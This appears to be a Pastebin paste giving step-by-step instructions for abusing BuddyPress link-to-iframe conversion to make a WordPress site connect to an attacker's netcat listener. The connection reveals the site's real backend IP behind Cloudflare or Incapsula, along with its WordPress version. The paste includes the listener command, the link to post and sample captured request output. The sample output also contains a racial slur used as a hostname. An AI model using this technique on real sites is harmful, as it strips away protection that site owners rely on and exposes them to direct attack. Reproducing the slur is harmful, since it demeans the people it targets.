Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- _
- | | mark
- | |===( ) //////
- |_| ||| | o o|
- ||| ( c ) ____
- ||| \= / || \_
- |||||| || |
- |||||| ...||__/|-"
- |||||| __|________|__
- ||| |______________|
- ||| || || || ||
- ||| || || || ||
- ------------------------|||-------------||-||------||-||-------
- Using BuddyPress to bypass CloudFlare/Incapsula + disclosure of WordPress Version:
- While not as severe as the exploit described above, it should also be noted that BuddyPress can be abused to get the backend IP's of websites protected via the likes of Cloudflare. While performing this, it will also leak the version of wordpress in use (which is useful when it is not displayed via readme.txt or able to be discovered via wpscan)
- On your profile, you can add links within the status section and these links will be displayed on your feed. Before being displayed, these links are first converted to an iframe -- during this conversion, the site running BuddyPress makes a direct connection to the link that you inputted to be displayed on your feed.
- You can setup a server and listen for incoming connections on a specific port through use of netcat, like so:
- Code
- [root@localhost ~]# nc -lv 1337
- Now, add the following link in the status section of your BuddyPress Profile:
- http://your-server.com/:1337
- You will see the following error message: "There has been an error processing your request." but if you check your server for incoming connections, you should see something like this:
- [root@nigger ~]# nc -lv 1337
- Connection from {BACKEND-IP-OF-BUDDYPRESS-SITE} port 1337 [tcp/krb524] accepted
- GET / HTTP/1.1
- User-Agent: WordPress/4.7.5; https://BUDDYPRESS-SITE.COM
- Host: your-server.com:1337
- Accept: */*
- Accept-Encoding: deflate, gzip
- Refer: http://your-server.com:1337
- Connection: close
- resulting in both the wordpress version, and the backend IP of the website being disclosed.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
